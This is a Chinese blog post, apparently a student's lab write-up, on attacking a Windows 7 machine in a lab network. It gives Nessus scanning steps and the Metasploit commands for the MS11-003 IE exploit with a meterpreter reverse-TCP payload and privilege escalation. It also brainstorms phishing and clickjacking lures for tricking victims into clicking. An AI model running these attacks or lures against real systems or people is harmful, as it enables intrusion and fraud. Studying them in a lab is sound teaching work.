Metasploit攻击win7

认识Windows漏洞

Windows系统漏洞又称安全缺陷,是威胁Windows系统安全的根本原因,一旦黑客抓住这些漏洞进发起攻击,目标计算机就会被控制。用户有必要了解Windows系统产生漏洞的原因和存在的隐患。

 

产生原因:

1、人为因素

  指Windows系统的编制人员由于技术缺陷或某种特定目的而导致系统产生的漏洞。另外一种情况是,在编写操作系统过程中,编程人员为了便于后期的调试,经常会在程序代码的隐蔽出留下后门。

2、硬件因素

  指由于硬件问题导致系统无法弥补硬件的漏洞。硬件问题通常包括硬件自身的设计缺陷及不兼容性。当硬件存在设计缺陷时,往往会通过软件表现出来,如由于硬件驱动程序与系统不兼容而出现的蓝屏、死机等现象,或由于组装机中各硬件的不兼容而导致的蓝屏和死机现象等。

  由于Widows系统广泛应用于个人计算机中,将导致大量的入侵者开始研究该系统潜在的漏洞。Windows系统于Linux等开放源码的操作系统不同,它属于暗箱操作,普通用户无法获取操作系统的源代码,因此安全 问题均由Mircosoft负责。(哈哈哈哈哈好惨)

 

系统中存在的安全隐患:

 

该操作系统含有大量的程序代码,因而不可避免的存在一些安全隐患。常见安全隐患主要有核心代码中潜在的BUG、扩展名欺骗、设备文件名问题、庞大而复杂的注册表、系统权限分配繁冗及设计失误。

 

1、核心代码中的潜在BUG

 

  对于操作系统这种含有大量代码的软件而言,潜在的BUG与程序的大小成正比。无论Windows XP、Win7、Win8,它们的核心代码没有太大的变化,从而导致Windows新版本操作系统在继承了老版本中核心代码的同时,也继承了潜在的BUG。

 

2、扩展名欺骗

 

  Windows操作系统不完全按照扩展名来处理文件,而是根据文件头部信息对文件性质做出初步判断。如重命名一个文件picture.jpg.exe,用ASCII值的255代替其中的空格,而在Windows中只能看见picture.jpg这样的文件名。恶意攻击者可能会将该文件连接一个可执行文件,但是其他的人将该文件当作一张普通照片文件。

 

3、设备文件没问题

 

  Windows系统中,用户可以通过字符链接来访问磁盘分区。如,使用“\.F”这样的方式来访问F盘。这是因为在编写某些程序时,由于对在控制对任意驱动器进行访问所采取的手段模块设计不足造成的。

 

4、注册表

 

  注册表对Windows是非常重要的,注册表实际上是一个很庞大的数据库,包含了应用程序和计算机系统的配置、系统和应用程序的初始化信息、应用程序和文档文件的关联关系、硬件设备的说明、状态和属性及各种状态信息和数据等。由于注册表过于庞大和复杂,因此容易出现漏洞而被人所利用。

 

5、系统权限分配繁冗

 

6、设计失误

 

  Windows操作系统设计方面存在很多失误。

(12条消息) Hacker(17)----认识Windows系统漏洞_weixin_33782386的博客-CSDN博客

 

Metasploit

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。

这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

 

优秀:

Metasploit是当前信息安全与渗透测试领域最流行的术语,它完全颠覆了已有的渗透测试方式。几乎所有流行的操作系统都支持Metasploit, 而且Metasploit框架在这些系统上的工作流程基本都一样。

 

模块介绍

exploit(漏洞利用模块)

漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为

流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。

 

auxiliaries(辅助模块)

该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试

 

payload(攻击载荷模块)

攻击载荷是我们期望目标系统在被渗透攻击(一点点地攻击目标系统的BUG,使目标系统的BUG扩大然后乘机攻击)之后完成实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令或者执行特定代码,在Metasploit框架中可以自由地选择、传送和植入。攻击载荷也可能是简单地在目标操作系统上执行一些命令,如添加用户账号等。

 

渗透攻击(补充)

网络渗透攻击”是对大型的网络主机服务器群组采用的一种迂回渐进式的攻击方法,通过长期而有计划地逐步渗透攻击进入网络,最终完全控制整个网络。

 

“网络渗透攻击”能够成功的原因

网络上总会有一些或大或小的安全缺陷或漏洞。攻击者利用这些小缺口一步一步地 将这些缺口扩大、扩大、再扩大,最终导致整个网络安全防线的失守,并掌控整个网络的权限。

什么是渗透攻击?-YUNDUN 网站安全加速云平台

 

 

post(后期渗透模块)

该模块主要用于在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击等。

 

encoders(编码工具模块)

该模块在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来。

 

Metasploit(MSF)攻击步骤

 

  • 扫描目标机系统,寻找可用漏洞。(auxiliaries)本文用Nessus工具代替这步
  • 选择并配置一个漏洞利用模块。(exploit)
  • 选择并配置一个攻击载荷模块。(payload)
  • 选择一个编码技术, 用来绕过杀毒软件的查杀。(encoders)
  • 渗透攻击。(post)

Metasploit模块简介 - coderge - 博客园 (cnblogs.com)

 

 

Nessus

Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的企业版。Nessus6.0以后采取Browser/Server模式,Server端负责进行安全检查、具体的扫描任务,客户端用来配置管理服务器端。服务端采用plug-in的体系,允许用户加入执行特定功能的插件,这插件可以进行更快速和更复杂的安全检查。Nessus自带大量安全检查插件能够满足一般用户的安全评估任务需要,如果有特殊需要也可以将自己开发的安全检查插件集成到Nessus中。

和其他安全扫描工具相比,Nessus主要优势在于免费、扩展性强,容易使用以及能够对目标系统进行全面的漏洞扫描。

默认状态下, Nessus安装成功后会开机自启动,用户使用安装时配置的账号登陆其管理界面,添加扫描任务,根据相关需要对扫描任务的相关属性进行详细的配置。等扫描完成以后,会生成一份详细的报告,报告里会将扫描结果按照危险系数高低分成高危漏洞、中危漏洞、低危漏洞三类,我们一般重点关注高危漏洞,中危漏洞利用条件会比较苛刻,低危漏洞基本没有利用的可能。查看高危漏洞详情,根据漏洞简介信息使用google搜索是否存在已知的Exp和攻击方法可以提高安全测试效率。

 

实验目的

通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试、攻击。

 

实验环境

 

 

 

漏洞主机:win7,IP地址:10.1.1.129

攻击主机:Kali linux,IP地址:10.1.1.128

 

互相了解

1.查看win7漏洞主机的登录用户及网络配置信息,可以看出漏洞主机IP为10.1.1.129

 

 

 

 

2.关闭win7的防火墙

cmd+“netsh firewall set opmode mode=disable”命令

 

 

 

3.切换攻击主机

查看攻击者主机登陆用户及网络配置信息

攻击主机登陆用户为root ,IP为10.1.1.128

 

 

 

在攻击主机上安装好Nessus后

 

利用Nessus扫描目标主机

攻击主机上:

执行命令 /etc/init.d/nessusd start 启动Nessus服务

 

 

 

打开游览器,访问Nessus控制端https://127.0.0.1:8834/

输入账号密码

 

 

 

新建一个扫描,依次选择“New Scan”-“Basic Network Scan”

 

 

 

 

 

 

配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描

 

 

 

启动它,让它扫

 

 

 

Nessus将安全问题归类为Info/Low/Medium/High/Critical五个等级,其中Critical等级的问题是最危险的,Info级别的问题通常是无关痛痒的信息显示问题。

点红框进入10.1.1.129查看详情

 

 

 

 

Nessus扫描出win7主机存在四个最高危漏洞、2个高危漏洞及其它漏洞问题。

进入查看

 

 

 

 

 

 

 

 选中高危漏洞,Nessus给出了该漏洞的介绍、风险信息、解决方案等详细信息。Risk information对于攻击者来说非常有用,可以根据Risk information去Google搜索是否存在已知的漏洞利用Exp。

 

 

 

 

利用MS11_003 IE漏洞攻击win7主机

win7主机系统存在MS11_030解析漏洞,但是该漏洞利用条件较为苛刻,因此选择MS11_003 IE CSS Import漏洞来演示如何通过诱骗攻击者点击我们精心构造的含有攻击代码的网页来实现系统入侵。

1.在kali中执行“msfconsole”,启动metasploit

 

 

2.运行命令:“use exploit/windows/browser/ms11_003_ie_css_import”选择漏洞利用EXP

 

 

 3.运行命令:show options,查看配置选项

 

 

 注意

SRVORT 8080

UPIPATH   no

 

4.设置生成的恶意网页的URI为baidu.com

运行命令:set URIPATH baidu.com

 

 

 

 

 

5.为防止服务器端口冲突,设置服务器端口为8060,避开常用端口8080

运行命令:set SRVPORT 8060

 

 

 

 

 

6.设置攻击负载

运行命令:set PAYLOAD windows/meterpreter/reverse_tcp

 

 

 

7.查看配置选项

运行命令: show options

 

 

 

 

8.设置LHOST以绑定本地IP

set LHOST 10.1.1.128

 

 

 

10.运行命令“exploit”开始进行攻击,生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页

 

 

11.切换主机win7,打开IE,访问http://10.1.1.128:8060/baidu.com,模拟受害者误点击网页

 

 

 

12.回到攻击机,可以看到有人中招

 

 

12.验证攻击是否成功。列出当前成功建立的回话,任意进入一个回话,查看攻击者的身份。可以尝试使用getsystem进行进一步的提权,如果提权失败则可以采取上传提权exe程序进行提权的方案获得最高权限。

sessions   列出所有会话

sessions -i 1   进入1号会话

getuid   查看当前用户

 

 

 

可以看到10.1.1.129

 

 

 

作业

 

 

查阅微软漏洞更新信息,有哪些重大的漏洞能攻破未打任何补丁的win7系统?

 

1.MS14-064 漏洞:

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,

 

远程攻击者利用此漏洞通过构造的网站执行任意代码

 

 

 

思考如何设计诱骗策略来提高目标用户点击我们构造的恶意网页的几率?

 1.利用收集到的信息,向受骗人员发携带链接的短信:恭喜某某中奖等

2.参考爱虫病毒,拿到被攻击目标的信息,获取其手机联系人

针对攻击目标的信息通过人功智能初步定位为学生,青年人,中年人,老人

再进一步定位其喜好,针对其喜好发送有针对意义的短信,比如:某某,我是某某,我喜欢你呀,我只有你的电话号码,但我想说的话都在你好,我是链接

某某,你的简历非常精彩,某某本公司需要进一步核实,本公司想要问你一些问题,请在你好,我是链接中回答,谢谢合作

3.游戏广告

以上是利用人的心理造成“这是真的”的假象,诱使其点击

4.高端手法,高端技术:采用点击挟持,伪装假官方网站等手法

 

补充:

点击劫持是一种比较常见的基于浏览器的攻击,曾一度备受关注的 Facebook ‘likejacking’ 骗局攻击、Adobe Flash Player 网站漏洞利用、Twitter 的 Don’t click 攻击等,都利用了点击劫持技术。可见点击劫持从未走远,它可能带来的安全问题更加不容小觑。

攻击者实施攻击的一般步骤是:

  1. 黑客创建一个网页利用iframe包含目标网站;
  2. 隐藏目标网站,使用户无法察觉到目标网站存在;
  3. 构造网页,诱骗用户点击特定按钮 (图1中的PLAY!按钮);
  4. 用户在不知情的情况下点击按钮,触发执行恶意网页的命令。
posted @ 2021-10-29 17:15  学习日志羁旅  阅读(770)  评论(0编辑  收藏  举报